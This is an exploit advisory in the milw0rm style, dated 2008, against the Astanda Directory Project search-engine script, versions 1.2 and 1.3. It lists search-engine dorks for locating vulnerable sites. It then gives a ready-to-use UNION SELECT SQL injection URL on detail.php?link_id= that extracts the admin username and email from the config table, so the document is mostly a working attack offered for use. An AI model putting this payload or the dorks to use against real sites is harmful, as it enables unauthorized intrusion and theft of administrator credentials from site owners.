#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=# # ~Author: you_kn0w # # ~Contact: you-know[at]linuxmail[dot]org # # ~Website: www.youknowz.info # # ~Script: Astanda Directory Project # # ~Bug: APD Remote SQL Injection # #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=# # Script Information # #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=# # # # Script name: Astanda Directory Project # # Script site: http://www.astanda.com/adp # # Script demo: http://www.astanda.com/adp/admin# # Description: Search Engine # # Version: v.1.2 & v.1.3 # #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=# # [-]Dorks: intext: Powered by APD intext: © Copyright 2005, 2006, Astanda.com, Pavel Golovko inurl:detail.php?link_id= # [+]How To Exploit: http://[target].com/[path]/detail.php?link_id=-1/**/union/**/all/**/select/**/1,concat(0x3C68313E557365723A203C2F68313E,admin,0x3C68313E456D61696C3A203C2F68313E,email),null,null,0,0,1,1,1,1,0/**/from/**/config/* # [+]Greetz: Greetz to; ka0x - Celciuz - JosS - Phanter-Root & Screamo //you_kn0w #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# # milw0rm.com [2008-02-06]